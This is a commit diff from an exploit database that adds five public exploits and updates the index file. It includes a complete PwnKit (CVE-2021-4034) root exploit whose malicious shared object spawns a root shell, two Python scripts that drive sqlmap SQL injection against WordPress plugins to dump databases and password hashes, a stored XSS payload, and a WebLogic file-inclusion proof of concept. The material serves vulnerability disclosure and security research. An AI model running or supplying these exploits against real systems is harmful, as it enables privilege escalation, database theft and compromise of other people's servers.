DB: 2022-01-28

5 changes to exploits/shellcodes PolicyKit-1 0.105-31 - Privilege Escalation Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated) WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated) WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
2022-01-28 05:01:59 +00:00 · 2022-01-28 05:01:59 +00:00 · d3b7d652cc
commit d3b7d652cc
parent f6940281e8
6 changed files with 348 additions and 0 deletions
--- a/exploits/linux/local/50689.txt
+++ b/exploits/linux/local/50689.txt
@ -0,0 +1,70 @@
+# Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation
+# Exploit Author: Lance Biggerstaff
+# Original Author: ryaagard (https://github.com/ryaagard)
+# Date: 27-01-2022
+# Github Repo: https://github.com/ryaagard/CVE-2021-4034
+# References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
+
+# Description: The exploit consists of three files `Makefile`, `evil-so.c` & `exploit.c`
+
+##### Makefile #####
+
+all:
+	gcc -shared -o evil.so -fPIC evil-so.c
+	gcc exploit.c -o exploit
+
+clean:
+	rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so
+
+#################
+
+##### evil-so.c #####
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void gconv() {}
+
+void gconv_init() {
+    setuid(0);
+    setgid(0);
+    setgroups(0);
+
+    execve("/bin/sh", NULL, NULL);
+}
+
+#################
+
+##### exploit.c #####
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#define BIN "/usr/bin/pkexec"
+#define DIR "evildir"
+#define EVILSO "evil"
+
+int main()
+{
+    char *envp[] = {
+        DIR,
+        "PATH=GCONV_PATH=.",
+        "SHELL=ryaagard",
+        "CHARSET=ryaagard",
+        NULL
+    };
+    char *argv[] = { NULL };
+
+    system("mkdir GCONV_PATH=.");
+    system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR);
+    system("mkdir " DIR);
+    system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules");
+    system("cp " EVILSO ".so " DIR);
+
+    execve(BIN, argv, envp);
+
+    return 0;
+}
+
+#################
--- a/exploits/php/webapps/50685.txt
+++ b/exploits/php/webapps/50685.txt
@ -0,0 +1,20 @@
+# Exploit Title: WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 25-10-2021
+# Exploit Author: Ceylan Bozogullarindan
+# Vendor Homepage: https://lenderd.com/
+# Software Link: https://mortgagecalculatorsplugin.com/
+# Version: 1.52
+# Tested on: Linux
+# CVE : CVE-2021-24904 (https://wpscan.com/vulnerability/7b80f89b-e724-41c5-aa03-21d1eef50f21)
+
+
+# Description:
+The plugin gives users real-time estimates by providing mortgage calculators. It does not implement any sanitisation on the color value of the background of a calculator in admin panel, which could lead to authenticated Stored Cross-Site Scripting issues. An attacker can execute malicious javascript codes for all visitors of a page containing the calculator.
+
+
+# Steps To Reproduce:
+1. Go to settings page available under the "Calculator" menu item.
+2. Click the "Select Color" button and type the following payload the input space: `hacked</style></head><script>alert(1)</script>`
+3. Click the "Save Changes" button to save settings.
+4. Create a new page and add the shortcode ([mcwp type="cv"]) of the calculator, for testing.
+5. Visit the page to trigger XSS.
--- a/exploits/php/webapps/50686.py
+++ b/exploits/php/webapps/50686.py
@ -0,0 +1,154 @@
+# Exploit Title: WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)
+# Date 23.01.2022
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://registrationmagic.com/
+# Software Link: https://downloads.wordpress.org/plugin/custom-registration-form-builder-with-submission-manager.5.0.1.5.zip
+# Version: <= 5.0.1.5
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2021-24862
+# CWE: CWE-89
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md
+
+'''
+Description:
+The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action
+before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue.
+'''
+
+# Banner:
+import os
+
+banner = '''
+
+ _____ _____ _____     ___ ___ ___ ___       ___ ___ ___ ___ ___
+|     |  |  |   __|___|_  |   |_  |_  |  ___|_  | | | . |  _|_  |
+|   --|  |  |   __|___|  _| | |  _|_| |_|___|  _|_  | . | . |  _|
+|_____|\___/|_____|   |___|___|___|_____|   |___| |_|___|___|___|
+
+                           [+] RegistrationMagic SQL Injection
+                           [@] Developed by Ron Jost (Hacker5preme)
+'''
+print(banner)
+import string
+import argparse
+import requests
+from datetime import datetime
+import random
+import json
+import subprocess
+
+# User-Input:
+my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+my_parser.add_argument('-u', '--USERNAME', type=str)
+my_parser.add_argument('-p', '--PASSWORD', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+username = args.USERNAME
+password = args.PASSWORD
+
+
+print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
+
+# Authentication:
+session = requests.Session()
+auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
+check = session.get(auth_url)
+# Header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Origin': 'http://' + target_ip,
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1'
+}
+
+# Body:
+body = {
+    'log': username,
+    'pwd': password,
+    'wp-submit': 'Log In',
+    'testcookie': '1'
+}
+auth = session.post(auth_url, headers=header, data=body)
+
+# Create task to ensure duplicate:
+dupl_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2'
+
+# Header:
+header = {
+    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
+    "Accept-Encoding": "gzip, deflate",
+    "Referer": "http://" + target_ip + ':' + target_port + "/wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2",
+    "Content-Type": "application/x-www-form-urlencoded",
+    "Origin": "http://" + target_ip,
+    "Connection": "close",
+    "Upgrade-Insecure-Requests": "1",
+    "Sec-Fetch-Dest": "document",
+    "Sec-Fetch-Mode": "navigate",
+    "Sec-Fetch-Site": "same-origin",
+    "Sec-Fetch-User": "?1"
+}
+
+# Body
+body = {
+    "rmc-task-edit-form-subbed": "yes",
+    "rm-task-slide": "on",
+    "rmc_task_name": "Exploitdevelopmenthack" + ''.join(random.choice(string.ascii_letters) for x in range(12)),
+    "rmc_task_description": "fiasfdhb",
+    "rmc_rule_sub_time_older_than_age": '',
+    "rmc_rule_sub_time_younger_than_age": '',
+    "rmc_rule_fv_fids[]": '',
+    "rmc_rule_fv_fvals[]": '',
+    "rmc_rule_pay_status[]": "pending",
+    "rmc_rule_pay_status[]": "canceled",
+    "rmc_action_user_acc": "do_nothing",
+    "rmc_action_send_mail_sub": '',
+    "rmc_action_send_mail_body": ''
+}
+
+# Create project
+a = session.post(dupl_url, headers=header, data=body)
+
+
+# SQL-Injection (Exploit):
+exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'
+
+# Generate payload for sqlmap
+print ('[+] Payload for sqlmap exploitation:')
+cookies_session = session.cookies.get_dict()
+cookie = json.dumps(cookies_session)
+cookie = cookie.replace('"}','')
+cookie = cookie.replace('{"', '')
+cookie = cookie.replace('"', '')
+cookie = cookie.replace(" ", '')
+cookie = cookie.replace(":", '=')
+cookie = cookie.replace(',', '; ')
+exploitcode_url = "sqlmap -u http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'
+exploitcode_risk = ' --level 2 --risk 2 --data="action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids%5B%5D=2"'
+exploitcode_cookie = ' --cookie="' + cookie + '"'
+print('    Sqlmap options:')
+print('     -a, --all           Retrieve everything')
+print('     -b, --banner        Retrieve DBMS banner')
+print('     --current-user      Retrieve DBMS current user')
+print('     --current-db        Retrieve DBMS current database')
+print('     --passwords         Enumerate DBMS users password hashes')
+print('     --tables            Enumerate DBMS database tables')
+print('     --columns           Enumerate DBMS database table column')
+print('     --schema            Enumerate DBMS schema')
+print('     --dump              Dump DBMS database table entries')
+print('     --dump-all          Dump all DBMS databases tables entries')
+retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
+exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + ' ' + retrieve_mode + ' -p task_ids[] -v 0'
+os.system(exploitcode)
+print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
--- a/exploits/php/webapps/50687.py
+++ b/exploits/php/webapps/50687.py
@ -0,0 +1,73 @@
+# Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
+# Date 26.01.2022
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://webnus.net/modern-events-calendar/
+# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip
+# Version: <= 6.1
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2021-24946
+# CWE: CWE-89
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md
+
+'''
+Description:
+The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter
+before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users,
+leading to an unauthenticated SQL injection issue
+'''
+
+#Banner:
+banner = '''
+
+ .oOOOo.  o      'O o.OOoOoo
+.O     o  O       o  O                 .oOOo. .oOOo. .oOOo.  oO             .oOOo. o   O  .oOOo. o   O  .oOOo.
+o         o       O  o                      O O    o      O   O                  O O   o  O    o O   o  O
+o         o       o  ooOO                   o o    O      o   o                  o o   o  o    O o   o  o
+o         O      O'  O       ooooooooo     O' o    o     O'   O   ooooooooo     O' OooOOo `OooOo OooOOo OoOOo.
+O         `o    o    o                    O   O    O    O     o                O       O       O     O  O    O
+`o     .o  `o  O     O                  .O    o    O  .O      O              .O        o       o     o  O    o
+ `OoooO'    `o'     ooOooOoO           oOoOoO `OooO' oOoOoO OooOO           oOoOoO     O  `OooO'     O  `OooO'
+
+                                                        [+] Modern Events Calendar Lite SQL-Injection
+                                                        [@] Developed by Ron Jost (Hacker5preme)
+
+'''
+
+print(banner)
+
+import requests
+import argparse
+from datetime import datetime
+import os
+
+# User-Input:
+my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+
+
+# Exploit:
+print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
+print('[*] Payload for SQL-Injection:')
+exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" '
+exploitcode_risk = ' -p time'
+print('    Sqlmap options:')
+print('     -a, --all           Retrieve everything')
+print('     -b, --banner        Retrieve DBMS banner')
+print('     --current-user      Retrieve DBMS current user')
+print('     --current-db        Retrieve DBMS current database')
+print('     --passwords         Enumerate DBMS users password hashes')
+print('     --tables            Enumerate DBMS database tables')
+print('     --columns           Enumerate DBMS database table column')
+print('     --schema            Enumerate DBMS schema')
+print('     --dump              Dump DBMS database table entries')
+print('     --dump-all          Dump all DBMS databases tables entries')
+retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
+exploitcode = exploitcode_url +  retrieve_mode + exploitcode_risk
+os.system(exploitcode)
+print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
--- a/exploits/windows/remote/50688.txt
+++ b/exploits/windows/remote/50688.txt
@ -0,0 +1,26 @@
+# Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
+# Date: 25/1/2022
+# Exploit Author: Jonah Tan (@picar0jsu)
+# Vendor Homepage: https://www.oracle.com
+# Software Link:
+https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
+# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
+# Tested on: Windows Server 2019
+# CVE : CVE-2022-21371
+
+# Description
+Vulnerability in the Oracle WebLogic Server product of Oracle Fusion
+Middleware (component: Web Container).
+Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
+and 14.1.1.0.0.
+Easily exploitable vulnerability allows unauthenticated attacker with
+network access via HTTP to compromise Oracle WebLogic Server.
+Successful attacks of this vulnerability can result in unauthorized access
+to critical data or complete access to all Oracle WebLogic Server
+accessible data.
+
+# PoC
+GET .//META-INF/MANIFEST.MF
+GET .//WEB-INF/web.xml
+GET .//WEB-INF/portlet.xml
+GET .//WEB-INF/weblogic.xml
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11433,6 +11433,7 @@ id,file,description,date,author,type,platform,port
 50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",1970-01-01,hyp3rlinx,local,windows,
 50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows,
 50664,exploits/windows/local/50664.txt,"WorkTime 10.20 Build 4967 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
+50689,exploits/linux/local/50689.txt,"PolicyKit-1 0.105-31 - Privilege Escalation",1970-01-01,"Lance Biggerstaff",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18599,6 +18600,7 @@ id,file,description,date,author,type,platform,port
 50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",remote,python,
 50652,exploits/windows/remote/50652.txt,"CoreFTP Server build 725 - Directory Traversal (Authenticated)",1970-01-01,LiamInfosec,remote,windows,
 50665,exploits/windows/remote/50665.txt,"Archeevo 5.0 - Local File Inclusion",1970-01-01,"Miguel Santareno",remote,windows,
+50688,exploits/windows/remote/50688.txt,"Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion",1970-01-01,"Jonah Tan",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44762,3 +44764,6 @@ id,file,description,date,author,type,platform,port
 50682,exploits/php/webapps/50682.txt,"Online Project Time Management System 1.0 - SQLi (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php,
 50683,exploits/php/webapps/50683.txt,"Online Project Time Management System 1.0 - Multiple Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php,
 50684,exploits/php/webapps/50684.py,"PHPIPAM 1.4.4 - SQLi (Authenticated)",1970-01-01,"Rodolfo Tavares",webapps,php,
+50685,exploits/php/webapps/50685.txt,"WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
+50686,exploits/php/webapps/50686.py,"WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
+50687,exploits/php/webapps/50687.py,"WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,